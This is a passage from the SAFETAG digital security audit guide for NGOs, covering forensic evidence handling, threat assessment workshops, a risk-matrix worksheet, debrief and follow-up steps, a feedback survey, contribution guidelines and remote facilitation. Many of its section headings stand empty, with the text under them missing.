This component describes how to perform an analysis on captured evidence (e.g. hard drive image or memory dump) without altering the evidence. Any alteration, or even an environment or situation that creates the possibility of alteration, could lead to rejection of the evidence in a court of law or to malware analysis failures.

Overview
Materials Needed
Considerations
Walkthrough

In most cases, reach out for help, there are multiple organizations which coordinate and can support malware analysis targeting NGOs. The Digital First Aid Kit has a list of organizations and in most cases secure contact details to seek support in doing advanced analysis. The Rapid Response Network, a project of CiviCERT is a consortia of these organizations who may be able to help. Citizen Lab is also well known for their analysis and research.

There are some procedures that must be followed to ensure the evidence is properly handled while the forensic analysis is taking place. These include:

In order to facilitate the data analysis, we recommend to get the output data from the image acquisition in raw/dd format, which is accepted as input file in several forensic analysis tools.

To analyze the acquired data, you can use the following tools:

Recommendation

If any indicators of compromise are found, using the Suspicious Activity Analysis approach to do very initial research/analysis and triage (are these known malware or adware IoCs, etc.), and adjusting your reporting and operational security procedures with the organization as appropriate.

Threat Assessment

Summary

This objective uses a variety of activities to identify possible attackers and gather background information about the capability of those attackers to threaten the organization. This consists of identifying a particular attacker's history of carrying out specific threats, their capability to carry out those threats currently, and proof that the threat has intent to leverage resources against the target.

Purpose

Checking the assumptions both of the organization and of the auditor by researching the current threats will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations. With greater ownership of the process the staff provides an opportunity to explore their threat landscape and become more engaged in addressing the threats identified when the audit is complete. By engaging with as many staff as possible the auditor is providing a framework for staff to explore threat identification processes when the auditor is gone.

The Flow Of Information

Threat Assessment Information Flow
Threat Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Threat Modeling Resources (General)

Threat research by focus area

Threat research by method

General Threats by Region

Technical Threats

Targeted Malware
Censorship and Surveillance Reports

Travel Threats

Activities

Pre-Mortum Risk Modeling

Covered in full in Risk Assessment:

Guiding Questions for High-Risk Organisations

Covered in full in Capacity Assessment:

Critical Data Activity

Covered in full in Data Assessment:

Threat Identification

Summary

These activities build off of a process or data mapping exercise to connect actual processes or assets and data of the organization with potential threats, then drilling down into specific, likely threats the organization faces, adversaries who might take advantage of them, and the impact of this happening.

The goal is to be able to answer the following questions:

Threat History

Threat Capability

Threat Intent

Overview
Materials Needed
Considerations
Walkthrough

Threat Identification (30 minutes per process):

Impact Identification (30 minutes per process): This exercise has the trainee lead the participants on a brainstorming of hypothetical consequences (impacts) when the threats identified earlier occur.

Adversary Exploration (Likelyhood):

Impact Ranking: The goal of this exercise is to have the trainee lead the host organization in classifying the severity of the possible impacts from the threats they have just explored.

Recommendation

Creating a Risk Matrix

Summary
Overview
Materials Needed
Considerations
Walkthrough

After the activities are complete the auditor has tasks that build upon the outputs of the activities. These can be completed offsite.

Risk vs Difficulty
Risk vs Difficulty
Risk vs Likelihood
Risk vs Likelihood
Impact vs Severity
Impact vs Severity
Recommendation

Threat Interaction

Summary

This helps the auditor enumerate threats that the organization is concerned about and the internal priorities of them. At the same time, it enables a discussion of how threats can interrelate and helps define the difference between a threat and a risk (a threat that has a vulnerability associated with it), and the value of mitigation.

This exercise works well with larger groups, and can be woven in to the Threat Identification activity.

Overview
Materials Needed
Considerations
Walkthrough

Also review the Threat Identification exercises below to tailor these to best meet your information gathering needs based on your interactions with the organization.

Threat Brainstorming (15 minutes)

Split participants into small groups. This grouping is particularly valuable for larger organizations, but even for small ones, having multiple separate groups helps reveal shared concerns around the threats the staff face. For a group that is too small to group, have each staff member brainstorm by themselves.

Have each group or staff member quickly write down any possible "threat" they or the organization face. Some examples ("kidnapping," "website hacked") can help seed this activity.

If you have multiple colors of stickies, having them categorize threats by "physical," "digital," or "other/both" will be useful to show their inter-relation.

Keep reminding participants of the time remaining to keep them brainstorming rather than discussing threat details or arguing over whether a threat is physical or digital.

Threat Clustering and Discussion

After the brainstorming (or other exercises to generate or present a list of concerns), gather and cluster the stickies on a wall, revealing duplicate concerns across the groups and thematic areas of concern.

As clusters become clear, ask if any events similar to this threat have already happened to the organization? What was the impact? Has it happened more than once? Regularly? Mark these threats.

Note: Some of these threats may be traumatic experiences, consider skipping public discussion of historical occurrence if many of the threats from the brainstorm (or from one person/group in particular) are particularly intense.

Threat Bow-tie

Select one of the threats that emerged as a concern from the clustering to place at the center of a "bow-tie" like drawing on a whiteboard or flip-chart paper.

Begin asking what other threats identified could come as a result of this threat, supplanting the responses from the participants with additional threats. For example, a hacked website could lead to loss of trust by funders or partners. "Chain reactions" can be illustrated as lines of events (loss of trust by funders could lead to a loss of funding). Do the same for what threats could lead to the "central" threat - a confiscation of a device could lead to email hacking, for example. Some threats can be both potential causes and secondary effects.

Close out this with a discussion of how every threat is potentially connected to both digital and physical impacts.

Threat Analysis Worksheet

The auditor should be able to modify and complete a worksheet like the below at the end of this process. Particularly advanced organizations may be able to fill this out as a survey.

Calculative Impact Identification

Threat type Impact Likelihood Risk
HUMAN THREATS
1. Accidental destruction, modification, disclosure of confidential information
2. Ignorance: inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge
3. Workload: Too many or too few system administrators, highly pressured users
4. Users may inadvertently give information on security weaknesses to attackers
5. Incorrect system configuration
6. Inadequate security policy
7. Dishonesty: Fraud, theft, selling of confidential information
8. Attackers may use telephone to impersonate employees to persuade users/administrators to give user name/passwords, etc
GENERAL THREATS
1. Unauthorized use of “logged-in” computers
2. Installation of unauthorized software or hardware
3. Denial of service, due to Website traffic, large PING packets, etc.
4. Malware in programs, documents, e-mail attachments, etc
IDENTIFICATION AUTHORIZATION THREATS
1. Attack software masquerading as normal programs (Trojan horses)
2. Attack hardware masquerading as normal commercial hardware
3. External attackers masquerading as valid users
4. Internal attackers masquerading as valid users
PRIVACY THREATS
1. Telephone eavesdropping (via telephone bugs, inductive sensors, or service providers
2. Electromagnetic eavesdropping
3. Rubbish eavesdropping (analyzing waste for confidential documents, etc.)
4. Planted bugs in the building
INTEGRITY/ACCURACY THREATS
1. Deliberate damage of information by external source
2. Deliberate damage of information by internal sources
3. Deliberate modification of information
ACCESS CONTROL THREATS
1. Password cracking (access to password files, use of default/weak passwords, etc)
2. External access to password files, and sniffing of the networks
3. Unsecured maintenance of online services, developer backdoors
4. Bugs in network software which can open unknown/unexpected security holes (holes can be exploited from externally to gain access)
5. Unauthorized physical access to system
LEGAL THREATS
1. Failure to comply with legal requirements
2. Liability for acts of internal users or attackers who abuse the system to perpetrate unlawful acts (ie, incitement to racism, gambling, money laundering, distribution of pornographic or violent material)
3. Liability for damages if an internal user attacks other sites
RELIABILITY OF SERVICE THREATS
1. Major natural disasters, fire, water, earthquake, floods, power outages, etc
2. Minor natural disasters, of short duration, or causing little damage
3. Equipment failure from defective hardware, cabling, or communications system.
4 Denial of Service due to network abuse: Misuse of routing protocols to confuse and mislead systems
5. Downloading of malicious Applets, Active X controls, macros, PostScript files, etc through the browsers
6. Sabotage: Physical destruction of network interface devices, cables

Risk = Impact * Likelihood

SCALE
Impact Scale Likelihood
Impact is negligible =1 Unlikely to occur =0
Effect is minor, major organization operations are not affected=2 Likely to occur less than once per year =1
Organization operations are unavailable for a certain amount of time, costs are incurred. Public/customer confidence is minimally affected =3 Likely to occur once per year =2
Significant loss of operations, significant impact on public/customer confidence =4 likely to occur once per month =3
Effect is disastrous, systems are down for an extended period of time, rebuilding and replacement of systems is required =5 Likely to occur once per week =4
Effect is catastrophic, critical systems are completely down for an extended period; data is lost or irreparably corrupted; public and customers are totally affected =6 Likely to occur daily =5
Recommendation

Regional Context Research

Covered in full in Capacity Assessment:

Self Doxing

Covered in full in Risk Modeling:

Self-doxing:

This activity is aimed at showing the group how to research the data traces they leave online, as well as to improve the results of the Manual Reconnaissance activity with research carried out by individuals on themselves, which helps protect their privacy and makes results more detailed. With this approach, the auditor will only be informed about the results if mitigation steps such as takedowns are indicated.

Responsive Support

Summary

The auditor provides assistance for any immediate action needed (spot training, tool fixes, consulting on upcoming projects) -- this may also involve addressing vulnerabilities that triggered an incident response.

Purpose

In-audit activities and training are used to increase an organization's agency to seek out and address immediate security challenges within their organization, as well as enabling the organization to securely receive and store the audit report.

The Flow of Information

Responsive Support Information Flow
Responsive Support Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Facilitation Preparation

Digital Security Trainings

Digital Security Guides

Training Resources

Activities

Due to the wide variety of needs found during SAFETAG audits, the framework relies on the wealth of existing training curricula and digital security guides, listed below.

Of specific use are the following training guides from Level-Up. Review the Level-Up Curricula Guide prior to using these activities:

Debrief

Summary

This component consists of an out-brief to key points of contact, providing basic pressure relief through group and individual interactions, and planning future follow-up with the host and key individuals.

Purpose

SAFETAG is an auditing framework designed to connect small civil society organizations and independent media outlets to the digital security services they need. But, more than that it is designed to provide audits that increase an organization's agency to seek out and address security challenges independently. This can be an auditor's last in-person chance to engage with the staff to shape their perspective of the audit.

The debrief allows the auditor to ensure that they leave the host and its staff ready to start addressing their digital security. By providing some immediate outcomes to the host and its staff, and in combination with training or security consultation in the Responsive Support section, the auditor can ensure that the host sees the audit as a guide instead of a condemnation.

The Flow of Information

Debrief Information Flow
Debrief Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Facilitation Preparation

Activities

Follow Up

Summary

This component allows an auditor to explain and get feedback on their report as well as evaluate the success of the process over time through a continued relationship with the host.

This component consists of the final meeting with the host and following up with them after a period of a few months to see if they need further assistance, are willing to share their experience working with any of the recommended resources, or as new resources are identified.

Purpose

Follow up can be a valuable tool for encouraging an organization to continue their digital security process. But, follow up needs to be desired by an organization and achievable for the auditor. As such, follow up must be minimally intrusive on both the auditor and the host's time.

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Resource Lists

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme _See also the "Alternative Sources of Funding" list on this page

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Digital Security Trainings

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Activities

Follow-up Meeting

Summary

Schedule and have a follow up call to discuss the audit report. This provides a valuable touch-point for the organization to read the report and ask any clarifying questions to the auditor, as well as for the auditor to underscore any important steps for the organization.

Overview
Materials Needed
Considerations
Walkthrough

Each organization, and often even each key point of contact within the organization, will want to explore the report in different ways. Adapt to the needs of the organization, but make sure you cover the top-priority recommendations that the organization needs to consider in the immediate future.

Ask the organization to fill out Staff Feedback Surveys.

Ask if they need any specific resources or introductions not included in the report.

At the end of the call, schedule a second follow-up call to check in on their progress.

Recommendation

Making Introductions

Summary

Make introduction between host and known resources as needed.

Overview
Materials Needed
Considerations
Walkthrough

Based on the specific recommendations in the audit report, as well as the auditor's understanding of the organization's capacity and barriers faced, introduce the relevant points of contact at the organization to resources such as digital security trainers, funding organizations which provide targeted support for digital security, technical experts to help on specific tasks (e.g. server hardening, website migration), as well as services that could help address their needs (e.g. secure hosting providers, rapid response support).

Follow up with both the organization and the resources introduced to check in on process and revise which introductions you make going forward.

Recommendation

Long-Term Follow-up

Summary

Follow up with host after a few months to check on progress, get long-term feedback and connect with any new resources.

Overview
Materials Needed
Considerations
Walkthrough

This can be combined with the Staff Feedback Survey exercise, or to follow up on any concerns you have based on their responses to that survey. The main goal of the long-term follow-up is to ensure that the organization has ongoing connection points to any resources or connections they need to remove barriers to adoption.

Recommendation

Staff Feedback Survey

Summary

Providing a space for anonymous, guided feedback is valuable to gather information about how your audit work and the SAFETAG framework itself are supporting organizational understanding of risk and their ability to adapt. This long-term capacity building is critical to the SAFETAG framework, so finding ways to measure the impact of an audit towards these goals is important.

Overview
Materials Needed
Considerations
Walkthrough

This exercise provides a simple survey you can implement in a variety of settings (Google Forms, SurveyMonkey, via plain documents, etc.).

Sample Survey Questions

  1. Before the audit:
Completely False False I don't know True Completely True
I understood the risks my organization faces [ ] [ ] [ ] [ ] [ ]
I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
  1. After the audit:
Completely False False I don't know True Completely True
I understood the risks my organization faces [ ] [ ] [ ] [ ] [ ]
I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
  1. Do you feel the audit took a reasonable amount of time?
  1. Do you have any immediate behavioral changes you intend to make because of the audit?
  1. Did the auditor provide you everything you need to start addressing your digital security?
  1. Did any training that you received specifically address the risks identified during the audit?
  1. Did the recommendations made by the auditor directly address the digital security needs you identified during the audit?
  1. Did the recommendations made by the auditor address the digital security needs of your organization?
  1. The recommendations from the audit...
  1. The biggest barrier you see to implementing the auditor's recommendations is....
Recommendation

Reporting

Recommendation Development and Resource Identification

Summary

In this component the auditor identifies the organization's strengths and weakness (expertise, finance, willingness to learn, staff time, etc.) to adopting new digital and physical security practices and documents the possible actions the organization could take on to address the vulnerabilities found during the audit, the difficulty of taking on those actions, and the resources that the host may be able to leverage to address them. Resources can include, but are not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resrouces they can use to support their up-skilling.

Purpose

The host needs to be able to take action after an audit. The recommendations that an auditor provides to address vulnerabilities must cover a range that allows an organization to address them in both the short-term and more comprehensively in the long-term. Knowing an organization's strengths and weaknesses will allow the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. In doing this the SAFETAG auditor has an opportunity to act as a trusted conduit between civil society organizations in need and organizations providing digital security training, technological support, legal assistance, and incident response.

Guiding Questions

Approaches

Outputs

Operational Security

Resources

Digital Security Guides

Digital Security Guides

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme _See also the "Alternative Sources of Funding" list on this page

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Training Resources

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Resource Lists

Recommendation Development

Resource Identification

Summary

In this component the auditor documents resources that the host may be able to leverage to address the technical, regulatory, organizational, or behavioral vulnerabilities identified during the audit.

This can include, but is not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Roadmap Development

"Finding threats against arbitrary things is fun, but when you're building some-thing with many moving parts, you need to know where to start, and how to approach it." - Threat Modeling: Designing for Security by Adam Shostack 90

Summary

This component consists of an auditor sorting their recommendations in relation to the organizations threats and capacity. The auditor prioritizes vulnerabilities, weighs the implementation costs of recommendations and then creates an actionable roadmap for the organization to make their own informed choices about possible next steps as they move forward.

Purpose

As part of SAFETAG's dedication to building agency and supporting organizational adoption of safer practices, a careful prioritization of vulnerabilities is invaluable in keeping audit results from appearing overwhelming. An organization needs to be able to weigh their possible paths forward against the time lost from program activities, the cost to implement the threat, and the other threats that they are not addressing. Roadmapping is used to give the host the tools to make these decisions and provide them with a recommended path forward that will allow them to make immediate gains towards protecting themselves. The existing in/formal security practices captured during this process will be used to remove organizational and psyco-social barriers to starting new practices.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Report Creation

"A good analysis might turn the threats into stories so they stay close to mind as software is being written or reviewed. A good story contains conflict, and conflict has sides. In this case, you are on one side, and an attacker is the other side." - Threat Modeling: Designing for Security 92

Summary

This component consists of an auditor compiling their audit notes and recommendations into a comprehensive set of documents the shows the current state of security, the process by which the auditor came to that assessment, and recommendations that will guide the hosts progression to meet their security goals.

Purpose

Once an auditor has left, the report is the auditor's chance to continue a conversation (albeit a static one) -- even if the organization never talks to the auditor again. If written with care it can be a tool to encourage agency and guide adoption. The report has many audiences who will need to use it in different ways. For the auditor and the organization, it acts as documentation of what an auditor accomplished. For the organization, it will be guide for connecting vulnerabilities to actual risks, a rallying cry for change, and proof of need for funders. For those the organization brings in to support their digital security, it provides a roadmap towards that implementation and a task-list for future technologists and trainers paid to get the host there - as well as a checklist for validating that threats have been addressed.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

APPENDICES

APPENDIX: Code of Conduct and SAFETAG Governance

Mission Statement:

The mission of the SAFETAG community is to improve the security of civil society organizations around the world.

What we do: The community collaborates actively to share knowledge, build capacity, and create resources, while promoting transparency and accountability amongst its members, as well as with other communities of practice.

Community Standards

The SAFETAG Community of Practice (SCoP) will a be a closed and private group, initially housed within the existing orgsec.community listserv.

SAFETAG Code of Conduct

Members of the SAFETAG community are expected to:

Community Manager

There will be, given that funds are available, a paid community manager who has at least a quarter of their time to support the SAFETAG community and contribute to and support the broader community around NGO organizational security. This community manager should rotate among organizations implementing substantial organizational security work. There may be gaps and/or overlaps due to project and staff funding requirements; it is important for implementing organizations to coordinate funding this position in order to minimize this.

The CM's role is to cultivate, support, and grow the community. This includes, but is not limited to:

The Advisory Board

Structure

Responsibilities

Contact

For SAFETAG content related questions, please file an issue: https://github.com/SAFETAG/SAFETAG/issues You can email the SAFETAG Advisory Board at AdvisoryBoard at safetag.org

APPENDIX: How to contribute to SAFETAG

Contributing to SAFETAG

SAFETAG welcomes contributions!

SAFETAG is a community-managed product with an advisory board and community management roles laid out in our Code of Conduct. The Code of Conduct further outlines expectations of not only those using the content herein but also those contributing to it. By participating, you are expected to uphold this code.

When submitting new content, please write in clear, concise, and gender neutral language. This document will be updated with guidance on content translation once we have settled on a process for that. If you would like to submit content in a language other than English or Spanish, please open an issue to set that language up for submission.

Getting Starting

Before you start work, it is critically important to review the current content and existing issues and create a new issue for your proposed work to solicit feedback -- this will save you a lot of time as the SAFETAG community can help refine your idea and advise on where best to include it in the framework (is it a new method? An activity or variant? Is there existing content in SAFETAG to update or improve?), as well as suggest additional resources worth considering, operational security and safety considerations.

You can also join the public slack to discuss changes and ask questions to the community.

Content Creation Guidelines

This section helps walk you though how SAFETAG is constructed, and what pieces of content are important to provide in a submission. Submissions which do not follow these guidelines will take significantly longer to be incorporated.

SAFETAG has currently three main compiled products - an overview guide, the full guide, and a curricula to help train new auditors. This guide is primarily focused on the non-curricular SAFTAG content. The Curricula is an ADIDS-based approach to training on SAFETAG content (read more about the curricula content at https://github.com/SAFETAG/SAFETAG/wiki/Curricula-Document-Template

The SAFETAG overview is the easiest place to start. The full guide is a comprehensive collection of not only the method-based objectives of the audit, but a variety of specific activities an auditor might choose to use and combine to achieve those. Both of these are built from the collection of Methods and Activities that make up SAFETAG.

Generally speaking, Methods are high-level, goal-focused aspects of the assessment. There are inevitable "fuzzy" borders between some methods. Creation of new methods should be minimized to not overly complicate the scope of SAFETAG.

Activities are the meat of an audit, and answer "how" and "where" type questions. To accomplish the goals of a method, one might conduct multiple activities to explore and verify organization practices from different angles - research, policy review, conversations / discussions, and technical verification, exploration, and scanning.

Within both Methods and Activities are smaller chunks of content which are used across the full range of SAFETAG "products." The tables below map out what content chunks exist across which products, and what they are. The Templates folder has sub-folders which provide the default files and indices for methods and activities.

SAFETAG is in the process of being rebuilt in a more interactive, meta-data driven interface at https://github.com/contentascode/safetag. The current structure will be migrated into this format, and updates to the process will be posted here.

Creating a new SAFETAG Method

New methods must be lined into the master index file, and must have activities linked to them. To link the new method into the master index file (and therefore have the method "included" in the "master" SAFETAG build, these index files must be linked into the relevant master index file in the language folder (en/index.guide.md and en/index.overview.md). See below for how Activities are linked in to the methods.

Method Content notes:

Method Section and Stylistic notes:

Section ADIDS Guide Overview Definition
Quote - - - OPTIONAL: No longer included in the compiled guides, but an introductory / framing quote for the section
Summary - + + A short - two to three sentence - basic overview of the methodology -- What is the auditor doing , what are the high-level outputs and processes?
Purpose + + + The justification for why this methodology is used -- Why is this collection of activities being pursued? what is the end goal?
Information Flow - + + The "Flow of Information" shows the types of information that an audit activity builds upon (input), and the types of information that an audit activity may reveal (outcomes). As this information is acquired, earlier audit will have to be re-visited based upon this information -- What are the inputs which feed in to this, and what outputs are possible/expected? Modify the Information Flow diagram in images/info_flows
Guiding Questions + + + Each audit activity is guided by a small set of core questions. Key questions are included to help an auditor identify when they have acquired enough information and customize their approach while still collecting the correct types of information to support the organization -- What are specific guiding or research questions to be answered by conducting activities in pursuit of the larger goal?
Approaches - + + Many of these audit activities can be completed in multiple ways depending upon auditor skill and the organizational technical setup and capacity. The approach section includes a descriptive, bulleted list of activities that can be used to carry out parts, or the whole, of the information collection for an audit activity. -- What are the high-level approaches to answering the guiding questions? Try to list different types of approaches - some might be technical, some research, some interactive
Outputs - + - The data or impact is expected from this method -- What are specific outputs to aim for? These should further clarify the information flow diagram above.
Operational Security - + + OPTIONAL: Operational Security considerations -- Does pursuing this objective have any broad operational security challenges to be aware of that is not otherwise captured in the per-activity detail?
Preparation - + - OPTIONAL: Any preparation, skills, or materials needed for the method as a whole. Individual exercises will specify this more exactly -- What must an auditor do to prepare for this work that is not otherwise captured in the per-activity detail?
Resources - + - Resources should include not only the research used in the creation of the method, but also recommended reading, references, and additional options for conducting this work -- What references did you use in creating this method? Are there references which provide activity style walkthroughs or additional backgrounds? Are there existing collections of references (in the references folder) that an auditor should review when looking at this methodology.
Activities - + - Specific activities to conduct in pursuit of this objective. See "Creating a New SAFETAG Activity" -- What existing activities are useful to achieve the goal and specific output(s) listed? Do they represent? If creating a new method, often new activities will be needed to ensure the suggested approaches are "filled in". Please note that Activities are separate documents linked in to the Methods

Creating a new SAFETAG Activity

New activities must be linked to a method. To link an activity to a method, please update both the activities.md file in the method folder, and also add it directly to index.guide.md under the method. The current build process uses the index.guide.md link, but for content tracking, it's best to update both. If adding an activity to multiple methods, select a primary method where it is the most relevant to that method's outputs, and for additional methods, link it in following this format:

 <div class="boxtext">
 #### Activity Title
 Covered in full in Primary Method:
 !INCLUDE "exercises/activity_title/approach.md"
 </div>

Activity Content notes:

Note: For activities where multiple different approaches could fulfill the exact same goals consider building activity variants, see below

Activity Content and Stylistic notes:

Section ADIDS Guide Overview Definition
Summary - + - A concise description of the exercise. This describes the vulnerability of class of vulnerabilities (e.g. "PHP is out of date") and its overall impact -- What does this specific activity accomplish?
Overview - + - A short, bulleted list that clarifies the general steps, especially for cases where the walkthrough is very complex or involves multiple or parallel processes. Also included when only referencing an exercise from a method, instead of including the full exercise.
Materials Needed - + - Optional; does this require specific software, hardware, or preparation?
Considerations - + - Optional; Notes on safely carrying out the activity and protecting the data collected, as well as other challenges (psycho-social, legal, ethical) to be aware of -- Are there operational security concerns, or important baseline skills to master before undertaking this activity?
Walkthrough - + - A multi-use guide with concise instructions for a skilled technologist to replicate or prove the vulnerability. This is used in the SAFETAG curricula, by auditors needing to recall that random flag for that one command without going online, and for the organization's technical staff to verify that this vulnerability has been addressed. This should provide concise guidance at a peer level for the general steps an auditor should take, but should point to, not re-create existing documentation. For technical aspects, ideal walkthroughs should enable IT staff/contractors to follow along and verify fixes. For research activities, research methods and preferred resources should be provided, and for facilitative exercises, a clear explanation of the process and any tips or challenges should be explained.
Variants - + - Parallel approaches which can be used for the same affect but might work better in different contexts. See below for when and how to use these
Recommendations - + - Optional; Sample text of common recommendations for how to address vulnerabilities identified through this activity; e.g. "Work with the webmaster to update PHP and/or migrate to a hosting system which manages this automatically...") -- for activities which have common findings, provide stock language to assist in report creation

Activity variants

In some cases, one activity will have many parallel ways to achieve the goal this is often the case with technical activities where there is a collection of similar tools all focused on the same overall outcome. In cases like these, it is best to create Activity Variants instead of new activities. This lets different auditors select and use tools and approaches they are most comfortable with, while still operating within the larger SAFETAG framework.

To use variants, you will create files in the activity's folder that begin with variant_, and link them in from the instructions.md file. The variant_ files should not use any header formatting.

In your instructions.md file, begin by introducing any common, cross-variant instructions or guidance not covered in other activity sections, and summarize each variant. At the end of the instructions text, add the following for each variant, updating the title and file name to the specific variant:

 ___

 ###### VARIANT TITLE

 !INCLUDE "variant_descriptive_file_name.md"

Other SAFETAG Content

These sections operate at header level 1, and for the most part should be included in any custom creation of SAFETAG products.

Front and Back Matter

Generally speaking, these sections won't be updated very often.

Section ADIDS Guide Overview Description
Title Page + + + Can be customized for your needs, locally only
License + + + Please do not change the License
Introduction - + + Welcome language
Overview - + + An overview of the SAFETAG approach and the audit life-cycle
"Metro" Map + + +
Risk Assessment + +
Agency Building + +
Operational Security - + - Overall operational security concerns for the assessment process
Preparation - + + How to prepare to conduct an assessment
Appendices - + - Including the Code of Conduct, How To Read this Guide, Contribution guidance, and more.
Footnotes - + +

Reporting Contents

Reporting content and creation will be revisited shortly

Contributing

Once you've scoped your submission as described under "Getting Started" and the "Content Creation Guidelines" sections above, you can follow the fork/pull method or use the templated approach to submit new content. Regardless of the approach you take,

Using Submission Templates

We have developed easy to use templates for SAFETAG Methods and Activities you can use and submit with your issue. These can be found at en/templates/method-template.md and en/templates/activity-template.md. If you would like to edit these as word processor files, you can use pandoc for conversion: pandoc -i activity_template.md -o activity_template.odt . Final files should be submitted as markdown, however.

Please refer to the current Methods in the SAFETAG guide for additional detail and examples. The template will require manual merging into the repository, so please include how you would like to be credited.

Using Pull Requests

  1. Fork the repository, clone a local copy, and a create a new branch for your work (See Resources below for help with using git).
  2. Update your issue with your fork so the community can follow along!
  3. Follow the content creation guidelines below to create or update new content
  4. Making many small, targeted commits with concise, clear commit messages. Keeping each pull request focused is greatly appreciated. Please submit different pull requests (and possibly even branches!) for different thematic work.
  5. Test to make sure your changes work by building the PDF and/or migrating the content into the static site generator system.
  6. Push to your fork and submit a pull request to the Dev branch!

Resources

APPENDIX: Draft Engagement and Confidentiality Agreement

In order to protect the privacy of SUBJECT, AUDITOR agrees to comply with the following restrictions:

APPENDIX: Travel Kit and Checklist

Travel Kit Checklist

Hardware
Software / digital resources
Facilitation Supplies
Logistics

APPENDIX: Remote Facilitation

Remote Facilitation

Summary

This component suggests approaches to use if in-person facilitation is not possible, and to include participation from remote staff or offices when an organization has multiple locations. This supplements the Data Assessment, Process Mapping, and Threat Assessment exercises, enabling them to be conducted remotely.

This may not provide as deep results as in-person facilitation, but should provide adequate levels of expansion and verification of information needed, and even provide the secondary benefits in most cases of helping the organization build a shared understanding of its processes, risks, and riosk tolerances.

Overview

Conducting digital security audit remotely requires great commitment from both auditor and the organization. It requires careful planning, scheduling, documentation and coordination from both parties.

As situations may arise during the course of the project, adherence to the activities indicated on the project plan is required. Constant communication and participation are the keys for a successful remote audit.

After preparing the list in "materials_needed", you may first start selecting or combining different approaches in conducting remote audit.

There are four different approaches you can use, depending on what resources are available, the size and structure of the organization, and which activities you are trying to facilitate remotely. Is there someone that can help as an on-site facilitator? Are video conferences realistic (given bandwidth and cost)? How does the approach you use interact with existing organizational team structures?

Planning your audit:

Depending on which area you are auditing, you may decide on using mixed approaches during the course of the audit.

Materials Needed

In preparation with the remote facilitation activity, the following materials and documentation should be considered.

Considerations

Remote facilitation, if not done securely, can expose sensitive information from both the auditor and the organization. There are different ways to communicate and exchange information remotely. This can be by voice calls, emails, video conference, survey forms cloud storages and chat messages. Choose your tools based on ease of adoption for the organization, proven security, and open source, ideally audited code when possible.

Walkthrough

Selecting the most suitable approach requires understanding of the capacity and personel structure of the organization, including their ability to support communication technologies, and the availability of someone that can assist in facilitation.

After selecting the most suitable approach, auditor should make sure to prepare for remote facilitation:

Approach 1, on-site facilitator, with video chat auditor

Suitable when there is a person that can take a facilitation role on-site. Facilitator does not have to be a technical person, but should be able to manage the session, making sure that it is as inclusive and as productive as possible. Accommodates more participants than Approach 3 per session. If the auditor is able to join remotely, this provides an ideal substitute.

Approach 2, hybrid online/synchronous

Can be used with large group of participants, where it is possible to meet over multiple sessions with enough time to collect and analyse responses in between.

Approach 3, multiple small sessions

Suitable for medium to large groups where it is possible to conduct multiple small video chats. It is recommended for sessions to be arranged to include people from the same organizational level, but different functions/teams/arms/departments of the organization. This approach scales to larger organizations and helps ensure voices at different levels of the organization are heard.

Approach 4, hybrid offline/asynchronous

Sample Questions: Data Mapping

Footnotes


  1. Event Planning Inputs - Level-Up

  2. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  3. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  4. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  5. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

